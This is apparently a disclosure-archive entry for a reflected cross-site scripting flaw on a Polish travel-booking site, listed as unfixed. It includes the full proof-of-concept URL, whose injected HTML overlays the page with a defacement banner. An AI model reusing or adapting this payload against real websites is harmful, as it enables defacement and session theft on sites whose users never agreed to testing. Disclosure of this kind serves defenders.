Security researcher nevillon_devilteam_quad, has submitted on 07/02/2009 a cross-site-scripting (XSS) vulnerability affecting wycieczki.allewakacje.pl, which at the time of submission ranked 326136 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 05/07/2010. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 07/02/2009 |
Date published: 05/07/2010 |
Fixed? Mail us! | Status: UNFIXED |
URL: http://wycieczki.allewakacje.pl/booking_pl/allewakacje/index.php?KID=111020&showresult=1%22%3E%3Cdiv %20style=z-index:1000;width:2000px;height:2000px;background:black;color:lime;position:absolute;top:0 ;padding:100px;left:0px;font-size:50px%3EXSS%20by%20nevillon%20-%20devilteam%20quad%3C/div%3E%3Cfont %20alt=%22&formular=4&CREF2=368&detail=zielgebiet&termin=26.01.2009&ruecktermin=25.04.2009&erwachsen e=25%3B25&marke= |
Click here to view the mirror
|
|
|